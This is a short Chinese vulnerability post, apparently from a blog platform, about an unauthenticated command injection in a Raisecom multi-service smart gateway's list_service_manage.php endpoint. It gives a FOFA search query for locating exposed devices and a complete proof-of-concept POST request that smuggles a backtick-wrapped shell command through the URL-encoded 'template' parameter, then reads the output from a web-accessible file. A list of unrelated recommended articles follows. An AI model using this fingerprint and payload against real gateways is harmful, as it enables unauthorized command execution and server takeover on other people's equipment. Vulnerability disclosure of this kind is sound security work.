某智能网关 list_service_manage存在命令执行漏洞

外道・輪廻天生2024-09-12 1:06

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

复制代码 
body="/images/raisecom/back.gif"

漏洞复现

poc

复制代码 
POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

访问文件url+/tmp/1.txt获取命令回显

相关推荐
彭波3963 小时前
.NET Framework 3.5问题修复教程!可以离线修复
windows·安全·电脑·.net·开源软件
黄焖鸡能干四碗5 小时前
网络安全建设实施方案(Word文件参考下载)
大数据·网络·人工智能·安全·web安全·制造
hzhsec5 小时前
MSF-CobaltStrike实现内网socks代理转发上线
服务器·网络·安全·网络安全
xixixi777777 小时前
2026 年 03 月 20 日 AI+通信+安全行业日报(来更新啦)
大数据·人工智能·安全·ai·大模型·通信
SuperEugene8 小时前
TypeScript+Vue 实战:告别 any 滥用,统一接口 / Props / 表单类型,实现类型安全|编码语法规范篇
开发语言·前端·javascript·vue.js·安全·typescript
always_TT8 小时前
字符串输入:gets vs fgets(安全问题)
数据库·安全
努力的lpp9 小时前
2024小迪安全课程第三节复习笔记
笔记·安全
新手88609 小时前
Oracle VirtualBox虚拟机安装 和 安装 window11版本虚拟机 及 启用EFI和硬盘无法使用 问题
服务器·windows·计算机网络·安全·虚拟机
ALex_zry10 小时前
Docker Compose 配置文件完全指南:从基础到生产级安全实践
服务器·安全·docker
EnCi Zheng11 小时前
J7A-已有数据表如何安全添加新字段 [特殊字符]️
数据库·安全·oracle
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06OpenClaw 使用和管理 MCP 完全指南07UV安装并设置国内源08“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)09OpenClaw Control UI安全上下文访问配置10Labelme从安装到标注:零基础完整指南